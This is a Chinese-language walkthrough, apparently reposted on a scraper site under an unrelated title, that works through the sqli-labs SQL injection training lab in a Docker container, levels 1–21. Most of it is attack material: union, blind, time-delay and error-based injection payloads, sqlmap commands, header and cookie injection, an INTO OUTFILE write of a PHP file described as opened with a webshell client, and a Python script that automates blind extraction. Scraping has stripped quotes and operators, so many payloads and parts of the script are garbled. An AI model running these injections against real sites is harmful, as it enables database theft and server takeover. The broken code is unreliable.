当前位置：首页 > news >正文

拖拽式网站建设wordpress教程微信

news 2025/11/27 11:54:51

拖拽式网站建设,wordpress教程微信,h5类型的网站是怎么做的,一个网站能卖多少钱?sqli-labs靶场安装以及刷题记录-docker sqli-labs靶场安装-dockersqli-labs靶场刷题less-1 单引号less-2 数字型less-3 单引号括号less-4 双引号括号less-5 单引号布尔盲注less-6 双引号布尔盲注less-7 单引号加括号、输出到文件less-8 单引号布尔盲注less-9 单引号时间盲注les… sqli-labs靶场安装以及刷题记录-docker sqli-labs靶场安装-dockersqli-labs靶场刷题less-1 单引号less-2 数字型less-3 单引号括号less-4 双引号括号less-5 单引号布尔盲注less-6 双引号布尔盲注less-7 单引号加括号、输出到文件less-8 单引号布尔盲注less-9 单引号时间盲注less-10 双引号时间盲注Less-11 POST方法单引号Less-12 POST方法双引号和括号Less-13 POST方法单引号和括号布尔盲注Less-14 POST方法双引号布尔盲注Less-15 POST方法时间盲注Less-16 POST方法时间盲注双引号和括号Less-17 报错注入Less-18 UA注入报错注入Less-19 Referer注入Less-20 Cookie注入Less-21 Cookie注入base64编码 sqli-labs靶场安装-docker 拉取xss-labs靶场 docker pull c0ny1/sqli-labs:0.1启动xss-labs靶场 docker run --name sqlilabs -d -p 8081:80 c0ny1/sqli-labs:0.1访问 ip:80814. 首次开启靶场先点击Setup/reset Database for labs创建数据 sqli-labs靶场刷题 less-1 单引号要求输入ID参数在URL后面拼接 ?id1尝试闭合语句构造 ?id1 //有报错 ?id1 //正常回显推断参数是被单引号包围的 ?id1 #//错误回显 ?id1 -- //错误回显 ?id1 --//正常回显判断返回数据数 ?id1 order by 4 -- //在输入4时报错所以返回数据数为3。Unknown column 4 in order clause判断回显位 ?id1 union select 1,2,3 --//显示的id1的查询结果 ?id1 union select 1,2,3 limit 1,1--查数据库名 ?id1 union select 1,database(),version() limit 1,1--//security,5.5.47-0ubuntu0.14.04.1 ?id1 union select 1,group_concat(schema_name) from information_schema.schemata1 limit 1,1--//报错login name返回值设置了限制 ?id1 union select 1,1,group_concat(schema_name) from information_schema.schemata limit 1,1--查表名 ?id1 union select 1,1,group_concat(table_name) from information_schema.tables where table_schemachallenges limit 1,1--查列名 ?id1 union select 1,1,group_concat(column_name) from information_schema.columns where table_schemachallenges and table_nameX8H7POW1CY limit 1,1--查数据 ?id1 union select 1,1,group_concat(secret_1A0H) from challenges.X8H7POW1CY limit 1,1--less-2 数字型 ?id1//正常回显 ?id1 and 12//无回显数字型注入 ?id1 and 12 --//无回显 ?id1 and 11 --//正常回显payload ?id1 union select 1,2,3 limit 1,1--sqlmap跑一下 python sqlmap.py -u http://ip:8081/Less-2/?id1python sqlmap.py -u http://ip:8081/Less-2/?id1 --dbs --batchpython sqlmap.py -u http://ip:8081/Less-2/?id1 --tables -D challenges --batchpython sqlmap.py -u http://ip:8081/Less-2/?id1 --columns -T BTLPG8W39R -D challenges --batchpython sqlmap.py -u http://ip:8081/Less-2/?id1 --dump -T BTLPG8W39R -D challenges --batchless-3 单引号括号 ?id1 ?id1//有报错观察报错信息构造 ?id1) --//正常回显id1的查询数据 ?id1) union select 1,2,3 limit 1,1-- //payload可以使用less-1的方式手动查询或者sqlmap less-4 双引号括号 ?id1//正常回显id1的查询数据 ?id1//有报错观察报错入参是被双引号加括号包围的构造 ?id1) union select 1,2,3 limit 1,1 -- //payloadless-5 单引号布尔盲注 ?id1//有报错观察报错入参是被单引号包围的 ?id1 --//正常回显id1的查询页面you are in........查数据页面没有明确的回显只能逐个字符去查询然后判断结果是否正确页面是否回显you are in… ?id1--//正常回显id1的查询页面you are in........ ?id1 order by 3--//you are in........ //这里已经没有必要去查回显位数了参考WP 查数据库数量 ?id1 and (select count(*) from information_schema.schemata) 5 --查每个数据库名称 ?id1 and (select substring(schema_name, 1,1) from information_schema.schemata limit 1,1) c -- ?id1 and (select substring(schema_name, 2,1) from information_schema.schemata limit 1,1) h -- ?id1 and (select substring(schema_name, 3,1) from information_schema.schemata limit 1,1) a -- ?id1 and (select substring(schema_name, 4,1) from information_schema.schemata limit 1,1) l -- ?id1 and (select substring(schema_name, 5,1) from information_schema.schemata limit 1,1) l -- ?id1 and (select substring(schema_name, 6,1) from information_schema.schemata limit 1,1) e -- ?id1 and (select substring(schema_name, 7,1) from information_schema.schemata limit 1,1) n -- ?id1 and (select substring(schema_name, 8,1) from information_schema.schemata limit 1,1) g -- ?id1 and (select substring(schema_name, 9,1) from information_schema.schemata limit 1,1) e -- ?id1 and (select substring(schema_name, 10,1) from information_schema.schemata limit 1,1) s -- 第二个limit 1,1 代表从第二个数据查后面一个数据库名称challenges 以此类推还有一种方法不过只能查当前数据库名称 ?id1 and left(database(),1)s-- ?id1 and substr(database(),2,1)e-- ?id1 and substr(database(),3,1)c-- ?id1 and substr(database(),4,1)u-- ?id1 and substr(database(),5,1)r-- ?id1 and substr(database(),6,1)i-- ?id1 and substr(database(),7,1)t-- ?id1 and substr(database(),8,1)y-- //security之后查表名、列名等 less-6 双引号布尔盲注 ?id1 // you are in...... ?id1// 报错观察报错入参被双引号包围构造 ?id1 --//you are in......接下来的操作和less-5一样 less-7 单引号加括号、输出到文件 ?id1//未报错 ?id1//报错说明是单引号闭合看不到具体的报错WP上加了两个括号(只能猜啦 ?id1))导出数据到网站根目录路径可以扫描参考传送门 ?id1))UNIONSELECT * from security.users INTO OUTFILE /var/www/html/Less-7/users.txt-- ?id1))UNIONSELECT 1,2,?php phpinfo();? INTO OUTFILE /var/www/html/Less-7/info.php-- 有报错尝试了其他的语句还是有报错去Docker中看了下源文件发现已经成功写入users.txt, info.php了蚁剑可以成功连接 less-8 单引号布尔盲注 ?id1//空回显单引号应该是把入参语句给闭合了所以会报错对本题而言没有正常回显就是报错使用盲注的方法来判断 ?id1 --//正常回显you are in......接下来查询操作同Less-5一样甚至payload都一样 less-9 单引号时间盲注尝试了单引号以及加括号等都是you are in......正常回显借助sleep延时函数来判断观察标签页左上角转的时长 ?id1 and sleep(5) ?id1 and sleep(5) ?id1 and sleep(5) --//只有这个sleep刷新的较久 ?id1 and sleep(5) --在if语句中使用sleep查询数据库数量 ?id1 and if((select count(*) from information_schema.schemata)5 ,sleep(5),1) --先判断每个数据库名字的长度 ?id1 and if((select length(schema_name) from information_schema.schemata limit 0,1) 18 ,sleep(5),1) -- ?id1 and if((select length(schema_name) from information_schema.schemata limit 1,1) 10 ,sleep(5),1) -- ?id1 and if((select length(schema_name) from information_schema.schemata limit 2,1) 5 ,sleep(5),1) -- ......查各个数据库名字 ?id1 and if( (select substring(schema_name, 1,1) from information_schema.schemata limit 1,1) c ,sleep(5),1) -- ?id1 and if( (select substring(schema_name, 2,1) from information_schema.schemata limit 1,1) h ,sleep(5),1) -- ?id1 and if( (select substring(schema_name, 3,1) from information_schema.schemata limit 1,1) a ,sleep(5),1) -- ?id1 and if( (select substring(schema_name, 4,1) from information_schema.schemata limit 1,1) l ,sleep(5),1) -- ?id1 and if( (select substring(schema_name, 5,1) from information_schema.schemata limit 1,1) l ,sleep(5),1) -- ?id1 and if( (select substring(schema_name, 6,1) from information_schema.schemata limit 1,1) e ,sleep(5),1) -- ?id1 and if( (select substring(schema_name, 7,1) from information_schema.schemata limit 1,1) n ,sleep(5),1) -- ?id1 and if( (select substring(schema_name, 8,1) from information_schema.schemata limit 1,1) g ,sleep(5),1) -- ?id1 and if( (select substring(schema_name, 9,1) from information_schema.schemata limit 1,1) e ,sleep(5),1) -- ?id1 and if( (select substring(schema_name, 10,1) from information_schema.schemata limit 1,1) s ,sleep(5),1) --这题在sqlmap上跑的还挺快 less-10 双引号时间盲注还是时间盲注 ?id1 and sleep(5) ?id1 and sleep(5) ?id1 and sleep(5) -- ?id1 and sleep(5) --//只有这个sleep刷新的较久接下来的操作同Less-9 Less-11 POST方法单引号随便输一组账号和密码有回显输入Username为admin有报错回显可以利用在BP上抓包修改提交值修改uname为admin--登陆成功 unameadmin--passwd123submitSubmit//登陆成功开始查回显位数 unameadmin order by 2--passwd123submitSubmitunameadmin union select 1,2 limit 1,1 --passwd123submitSubmit//payloadunion联合查询数据库 unameadmin union select 1,group_concat(schema_name) from information_schema.schemata limit 1,1--passwd123submitSubmit接下来同之前的联合查询一样。学一下Sqlmap怎么跑POST数据中的注入将抓到的登录包保存到本地命名为login_POST python sqlmap.py -r D:\bp\login_POST --batch python sqlmap.py -r D:\bp\login_POST --dbs --batch python sqlmap.py -r D:\bp\login_POST --tables -D challenges --batch python sqlmap.py -r D:\bp\login_POST --dump -T BTLPG8W39R -D challenges --batchLess-12 POST方法双引号和括号随便输账号密码同Less-11一样会报LOGIN ATTEMPT FAILED去抓包改下看看 unameadminpasswd123submitSubmit//正常回显 unameadminpasswd123submitSubmit//报错了通过报错信息知道入参是被双引号和括号包围的可以构造payload了同样可以联合查询查询操作同Less-11 unameadmin) --passwd123submitSubmitLess-13 POST方法单引号和括号布尔盲注输入username为amdin有报错 unameadminpasswd123submitSubmit unameadmin) -- passwd123submitSubmit //闭合语句登陆成功没有回显位了只有一个成功的界面盲注同Less-5一样的操作先查数据库数量 unameadmin) and (select count(*) from information_schema.schemata) 5 -- passwd123submitSubmit之后操作参考Less-5sqlmap同样能跑成功 Less-14 POST方法双引号布尔盲注输入username为amdin有报错 unameadmin passwd123submitSubmit unameadmin -- passwd123submitSubmit //闭合语句也是没有回显数据只有登陆成功的界面同上一关一样的操作先查数据库数量 unameadmin and (select count(*) from information_schema.schemata) 5 -- passwd123submitSubmit之后操作参考Less-5sqlmap同样能跑成功 Less-15 POST方法时间盲注 admin admin admin -- admin --都是登陆失败的界面没有任何报错信息试试时间盲注也是同样的界面以及回显 admin and sleep(5) -- admin and sleep(5) -- admin) and sleep(5) -- admin) and sleep(5) --sqlmap跑出来了时间盲注应该是姿势不对又尝试了几次 admin and sleep(5) #//这个有明显的时延看了源码好像没有写屏蔽注释符这里不太明白为什么-- 不行 admin and sleep(5) -- //--加空格也可以-- 注释符在 MySQL 中需要后面跟一个空格才会生效所以把 -- 改为 -- 后它成功注释掉了后面的 SQL 代码从而使 SQL 注入得以绕过。 -- 注释符的规范要求后面必须有空格才能被解析为注释。# 不需要空格因此在某些情况下使用它更方便。查数据库数量 admin and if((select count(*) from information_schema.schemata) 5,sleep(5),1) # passwd123submitSubmit查数据库名字用脚本做一下 import requests import time# 靶场的目标URL url http://ip:8081/Less-15/ # 替换为你的目标URL payload_list [admin, ] # 假设最大数据库数量为10可以根据需要调整 max_db_num 10# 假设名称长度不会超过20 max_db_name_len 181# 延时时长 delay_time 6# POST 请求的基本数据替换为具体的参数 data {uname: , # SQL注入点位置passwd: 123, # 密码字段submit: Submit }# headers 信息如果需要可以设置 headers {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36,Content-Type: application/x-www-form-urlencoded }#执行多次请求并取平均值或中位数以减少误差。 def measure_response_time(url, data, headers, repetitions3):times []for _ in range(repetitions):start_time time.perf_counter()response requests.post(url, datadata, headersheaders)response_time time.perf_counter() - start_timetimes.append(response_time)# 返回中位数或者平均值减少单次延迟造成的误差return sum(times) / len(times) # 也可以使用 statistics.median(times)# 定义一个函数来测试数据库数量 def test_db_count():for i in range(1, max_db_num):# 构造SQL注入语句payload f{payload_list[0]} and if((select count(*) from information_schema.schemata) {i},sleep({delay_time}),1) #data[uname] payload# 记录请求的开始时间start_time time.time()# 发送POST请求response requests.post(url, datadata, headersheaders)# 计算请求的响应时间response_time time.time() - start_time# print(response_time)# 如果响应时间大于 delay_time 秒说明 sleep(delay_time) 被触发表示猜测的数据库数量正确if response_time delay_time:print(fDatabase count found: {i})return ielse:print(fTested {i}, no delay.)def test_db_name_length(db_index):for length in range(1, max_db_name_len):# 构造SQL注入语句获取第 db_index 个数据库的名称长度payload f{payload_list[0]} and if((select length(schema_name) from information_schema.schemata limit {db_index},1) {length},sleep({delay_time}),1) #data[username] payload# print(payload)# response_time measure_response_time(url, datadata, headersheaders)# print(response_time)# 记录请求的开始时间start_time time.perf_counter()# 发送POST请求response requests.post(url, datadata, headersheaders)# 计算请求的响应时间response_time time.perf_counter() - start_time# 如果响应时间大于 delay_time 秒说明 sleep(delay_time) 被触发表示猜测的长度正确if response_time delay_time:print(fDatabase {db_index 1} name length found: {length})return lengthelse:print(fTested length {length} for database {db_index 1}, no delay.)def test_db_name(db_index, name_length):db_name for i in range(1, name_length 1): # 根据长度逐字符猜测for char in range(32, 127): # ASCII 范围从 32 到 126可见字符# 构造SQL注入语句获取 db_index 对应的数据库名的第 i 个字符payload f{payload_list[0]} and if(ascii(substr((select schema_name from information_schema.schemata limit {db_index},1),{i},1)) {char},sleep({delay_time}),1) #data[username] payload# print(payload)# 记录请求的开始时间start_time time.time()# 发送POST请求response requests.post(url, datadata, headersheaders)# 计算请求的响应时间response_time time.time() - start_time# 如果响应时间大于 delay_time 秒说明 sleep(delay_time) 被触发表示猜测的字符正确if response_time delay_time:db_name chr(char)print(fFound character {chr(char)} at position {i} for database {db_index 1})breakprint(fDatabase {db_index 1} name: {db_name})return db_nameif __name__ __main__:print(testing num of database)db_num test_db_count()print(testing length of each database)db_lengths []for db_index in range(db_num):length_tmp test_db_name_length(db_index)db_lengths.append(length_tmp)print(testing name of each database)for db_index, name_length in enumerate(db_lengths):db_name test_db_name(db_index, name_length)Less-16 POST方法时间盲注双引号和括号 admin) and sleep(3)#操作同Less-15 Less-17 报错注入随便输一组数据输入admin用户感觉是POST方法和布尔盲注没测出来看看WP注入点在密码框passwd且有报错回显延时和报错注入好像都可以查数据库数量 unameadminpasswd-1 and updatexml(1,concat(0x7e,(select count(*) from information_schema.schemata)),1) #submitSubmit 查数据库名 unameadminpasswd-1 and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),1) #submitSubmit unameadminpasswd-1 and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 1,1)),1) #submitSubmit unameadminpasswd-1 and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 2,1)),1) #submitSubmit .......查每个数据库中的表名 unameadminpasswd-1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schemachallenges limit 0,1)),1) #submitSubmit 查每个列名 unameadminpasswd-1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schemachallenges and table_nameBTLPG8W39R limit 0,1)),1) #submitSubmit Less-18 UA注入报错注入这关也是看了WP通过观察源码发现可以UA报错注入可利用的SQL语句是 INSERT INTO security.uagents (uagent, ip_address, username) VALUES ($uagent, $IP, $uname)这时我们就不能像常规的报错盲注一样直接上我们得考虑一下闭合VALUES假如我们利用的点是$uagent那构建格式就应该是1,1,1)#在SQL语句中相当于 INSERT INTO security.uagents (uagent, ip_address, username) VALUES (1,1,1)#, $IP, $uname)这样就闭合了VALUES所以我们在uagent上正确的payload应该是 1,1,updatexml(1,concat(0x5e,database()),1))#Less-19 Referer注入需要有一组账号密码成功登录会回显Referer有些密码在Less-17被修改了源码中 HTTP_REFERER字段被拼接到数据库语句中在BurpSuite中抓包这条记录发送到Repeater尝试在Referer字段进行注入 Referer: 1 and order by 4 Referer: 1,1) #//闭合语句因为有报错回显无回显数据内容所以用报错盲注。查数据库 Referer: 1 and updatexml(1,concat(0x3a,(select group_concat(schema_name) from information_schema.schemata),0x3a),1),1)#//显示不完整 Referer: 1 and updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),32,31),0x3a),1),1)#//使用substr函数来获取剩余的内容同理查表、列以及数据 Less-20 Cookie注入登陆成功会有以下信息看了源码这关换成Cookie注入了测试一下 Cookie: unameadmin//有报错 Cookie: unameadmin#//闭合了有报错回显可以使用联合查询 Cookie: unameadmin order by 3# Cookie: unameadmin union select 1,1,databse() limit 1,1#Less-21 Cookie注入base64编码这关也是先登录会有Cookie但是和上关不同的是Cookie做了Base64编码测试payload unameadmin)#//闭合语句编码后的等号用%3D来替代 unameYWRtaW4nKSM%3Dunameadmin) union select 1,1,database() limit 1,1 # unameYWRtaW4nKSB1bmlvbiBzZWxlY3QgMSwxLGRhdGFiYXNlKCkgbGltaXQgMSwxICM%3D

查看全文

http://www.dnsts.com.cn/news/90180.html